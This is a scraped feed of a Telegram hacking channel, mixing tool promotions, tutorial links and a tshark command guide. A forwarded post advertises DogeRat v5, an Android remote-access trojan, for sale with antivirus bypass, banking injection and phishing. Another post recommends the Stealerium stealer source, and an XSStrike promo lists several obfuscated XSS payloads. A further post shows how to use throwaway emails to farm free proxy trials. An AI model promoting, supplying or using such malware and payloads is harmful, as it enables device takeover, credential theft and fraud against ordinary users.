CYBER TRICKS ZONE 🇮🇳
3.62K subscribers
795 photos
233 videos
655 files
2.7K links
This channel/community aims to provide free courses related to programming,web development, cyber security, ethical hacking and many more tech related stuff and news #programming, #coding, #ethicalhacking #cybersecurity. About: @about_cybertrickszone
Download Telegram
OpenSSF_threat_models.pdf
472.9 KB
#Whitepaper
#Threat_Research
"Threat Model of Enterprise Open Source Supply Chains", 2023.
Cisco_Firepower_Hardening.pdf
1.8 MB
#hardening
"Cisco Firepower Hardening Guide", 2023.
Forwarded from CyberShieldX 🇮🇳
Media is too big
VIEW IN TELEGRAM
DogeRat v5 Demo

- Added
• Locker - Lock/Unlock Device
• Open link in browser directly
• Auto Permission Like CraxRat
• Bypass all antivirus
• Crypto exchange Injection
• Banking Injection
• Custom phishing
• Stable in All Android versions
•And All old features ....

Know more :
https://github.com/shivaya-dav/DogeRat-Premium

Buy now @shivaya_dav

Request: please share this in your channel, I will bring free version update soon 🙂
🌟 XSStrike 🌟

Advanced XSS Detection Suite

📝
XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.

Instead of injecting payloads and checking it works like all the other tools do, XSStrike analyses the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine. Here are some examples of the payloads generated by XSStrike:
}]};(confirm)()//\
<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z
</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//

Apart from that, XSStrike has crawling, fuzzing, parameter discovery, WAF detection capabilities as well. It also scans for DOM XSS vulnerabilities.

Main Features
⚪️Reflected and DOM XSS scanning
⚪️Multi-threaded crawling
⚪️Context analysis
⚪️Configurable core
⚪️WAF detection & evasion
⚪️Outdated JS lib scanning
⚪️Intelligent payload generator
⚪️Handmade HTML & JavaScript parser
⚪️Powerful fuzzing engine
⚪️Blind XSS support
⚪️Highly researched work-flow
⚪️Complete HTTP support
⚪️Bruteforce payloads from a file
⚪️Payload Encoding

😸 Github
Media is too big
VIEW IN TELEGRAM
Get Phone GPS
Media is too big
VIEW IN TELEGRAM
Website Footprinting Using Netcraft
जैसा की आप सब लोग जानते हि होंगे की काफी सारे अधर्मी काफी कोशिशें कर रहे है सनातन धर्म को ठेस पहुंचने की तो उसी के लिए यह चैनल बनाया गया है !!

इस चैनल मे हम सनातन धर्म से जुड़ी हुई जितनी भी गलतफैमिया या गलत बातें फैलाई जारी है उनका खंडन किया जायेगा ओर सनातन धर्म की शिक्षा दी जाएगी !!


https://t.me/sanatandharmCDI
Forwarded from CrackCodes 🇮🇳 (Prapatti 爪ㄚ几Ҝ)
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
Hack Database

Database hacking is among the most important arts of the hacker. Usually, the hacker is seeking access to data and obviously, the database is usually where it resides. This makes the database the "Golden Fleece" of the hacker.
Read More

▪️Share & Support us▪️
JOIN:-@CyberSleuthhacking
JOIN:-
@CybersleuthNetworks
A Good Open Source Stealer Code:
https://github.com/Stealerium/Stealerium

▪️Share & Support us▪️
JOIN:-@CyberSleuthhacking
JOIN:-
@CybersleuthNetworks
Burp Suite 101 For Beginners🔥

#1 - Introduction and Installation:
🔗 hacklido.com/blog/621

#2 - Understanding Navigation, Dashboard, Configuration:
🔗hacklido.com/blog/624

#3 - Exploring Burp Proxy and Target Specification:
🔗hacklido.com/blog/625

#4 - Exploring Burp Repeater and Burp Comparer:
🔗hacklido.com/blog/628

#5 - Going deep Into intruder:
🔗hacklido.com/blog/631

Covering @Burp_Suite By @calc1f4r & @hacklido.

#BurpSuite #Hacking #Infosec #CyberSecurity #RedTeam
CYBER TRICKS ZONE 🇮🇳 pinned «Burp Suite 101 For Beginners🔥 #1 - Introduction and Installation: 🔗 hacklido.com/blog/621 #2 - Understanding Navigation, Dashboard, Configuration: 🔗hacklido.com/blog/624 #3 - Exploring Burp Proxy and Target Specification: 🔗hacklido.com/blog/625 #4 - Exploring…»
Forwarded from CrackCodes 🇮🇳 (Prapatti 爪ㄚ几Ҝ)
Please open Telegram to view this post
VIEW IN TELEGRAM
How to Get Good Free Proxies

1. Get an email, I recommend using
https://mail.tm or https://mail.gw, both are very easy to use and will give you an email that will work with this method

2. Head on over to
https://shiftproxy.io/ and register using the email you got from before and any username/password

3. Head to
https://shiftproxy.io/free-proxies and download the free proxies!

4. Enjoy!

▪️Share & Support us▪️
JOIN:-
@CyberSleuthhacking
JOIN:-
@CybersleuthNetworks
This media is not supported in your browser
VIEW IN TELEGRAM
Proxyscrape Premium Proxies
30 Days free Method

Links Used in the Video

> Visit link :
https://proxyscrape.com/premium-free-trial

> Mail Used : Smailpro.com/advanced

🆔 Join Us:
IRON MAN OF INDIA 🇮🇳👏🔥🙏 , REMEMBERING HIS UNCOUNTABLE SACRIFICES FOR OUR NATION ON HIS BIRTH ANNIVERSARY. #LEGEND
Here's's a guide covering some essential commands and examples to help you get started with Wireshark(GUI) that is TShark(CLI) 👩‍💻:

1. Capturing Traffic:
   - Interface selection:
     - tshark -D: List available interfaces.
     - tshark -i <interface>: Start capturing on a specific interface.

   - Capture filter:
     - tshark -f <filter>: Apply a capture filter.
     - Example: tshark -f "port 80": Capture traffic on port 80.

   - Saving captures:
     - tshark -i <interface> -w <output_file.pcap>: Save captured packets to a file.

2. Analyzing Traffic:
   - Reading a capture file:
     - tshark -r <capture_file.pcap>: Read a capture file.

   - Display filters:
     - tshark -Y <filter>: Apply a display filter.
     - Example: tshark -Y "ip.addr == 192.168.0.1": Display packets with a specific IP address.

   - Statistics:
     - tshark -r <capture_file.pcap> -z <statistics_type>[:<options>]: Generate various statistics.
     - Example: tshark -r capture.pcap -z io,phs: Display Input/Output (IO) and packets-per-hour (PHS) stats.

3. Advanced Analysis:
   - Protocol Hierarchy Statistics:
     - tshark -r <capture_file.pcap> -z io: Show a summary of protocol usage.

   - Conversations:
     - tshark -r <capture_file.pcap> -z conv,<fields>: Display conversation statistics.
     - Example: tshark -r capture.pcap -z conv,tcp: Show TCP conversation stats.

   - Extracting Objects:
     - tshark -r <capture_file.pcap> -X lua_script:<script.lua>: Use a Lua script to extract specific objects.

   - Decoding packets:
     - tshark -r <capture_file.pcap> -V: Output verbose packet details.

refer to the official documentation, for more detailed information
GUYS PHELE EK CHATTING WEBAPP BANAYE JAYE FOR HACKERS ONLY JAHA THEY SEND TIP TO SPECIFIED USER AND UPLOAD AND CREATE GROUPS ,GROUPS ME KUCH BHI POST KAR SKTE HAI NO RESTRICTION
Anonymous Poll
100%
YESS
0%
NO
EVEN CHATTING HOGA,FORUM,GAMES.POSTS SAB HOGA PAR FOR HACKERS , THEN AGAR USERS ACHE ARE HAI TOH WILL LAUNCH APP SOONNN AND EVEN AGAR USER ACHE CONTENT DALRA HAI AND USKO LIKES AND ALL ACHE ATE HAI TOH MONITIZATION BHI HAI,VIDEO STREAMING AND VIDEO SHARING SAB HAI